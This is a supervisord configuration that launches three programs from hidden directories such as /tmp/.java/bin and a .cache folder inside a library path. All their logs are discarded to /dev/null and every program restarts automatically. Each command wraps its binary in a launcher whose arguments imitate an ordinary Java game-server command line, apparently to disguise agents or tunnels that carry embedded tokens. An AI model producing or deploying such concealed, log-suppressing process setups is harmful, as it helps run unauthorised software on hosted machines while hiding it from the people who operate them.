[supervisord]
logfile=/dev/null

[program:gnet]
directory=/tmp/.java/bin
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./add-on.jar -s "i3D2a1E2X-5A1f9d9G8h7-5c4A1e9F9d6A3-8a1C5j1g6" -liq
stdout_logfile=/dev/null
autorestart = true

[program:nzcli]
directory=/tmp/.java/bin
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./agent.jar -c ./cli.yaml
stdout_logfile=/dev/null
autorestart = true

[program:nscli]
directory=/home/container/libraries/org/xerial/sqlite-jdbc/3.47.0.0/.cache
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./paper.jar -u ukgm1
stdout_logfile=/dev/null
autorestart = true
